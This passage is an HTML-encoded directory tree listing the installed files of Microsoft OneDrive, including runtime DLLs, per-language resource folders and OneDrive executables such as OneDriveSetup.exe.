&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libffi-8.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libgcc_s_seh-1.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libgio-2.0-0.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libGLESv2.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libglib-2.0-0.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libgmodule-2.0-0.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libgobject-2.0-0.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libgsf-1-114.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libiconv-2.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libintl-8.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; liblzma-5.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libpcre2-8-0.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libssl-3-x64.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libwinpthread-1.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; libxml2-2.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LoadingPage.html
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LoggingPlatform.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LogoImages
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; RNResources
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; resources.pri
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LogUploader.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Lottie.min.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; lt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; lv
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Graphics.Canvas.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.ReactNative.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SharePoint.Calc.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SharePoint.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SharePoint.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SharePoint.HttpSvr.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SharePoint.NativeMessagingClient.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SharePoint.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.SharePoint.WebSocketClient.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.Toolkit.Win32.UI.XamlHost.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft.UI.Xaml.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; minizip.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mi-NZ
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mip_ClientTelemetry.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mip_core.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mip_file_sdk.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mip_protection_sdk.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mip_upe_sdk.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ml-in
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mn
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mr
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ms
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; msipc.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; msvcp140_1_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; msvcp140_1.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; msvcp140_2_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; msvcp140_app.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; msvcp140_atomic_wait.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; msvcp140.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; mt-MT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; nb-NO
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ne-NP
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; nh.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; nl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; nn-NO
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; nso-ZA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OD4
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; zlib1.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrive.App.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveFileLauncher.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLauncher.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveLogo.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDrivePatcher.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveSetup.exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; OneDriveStandaloneUpdater.exe
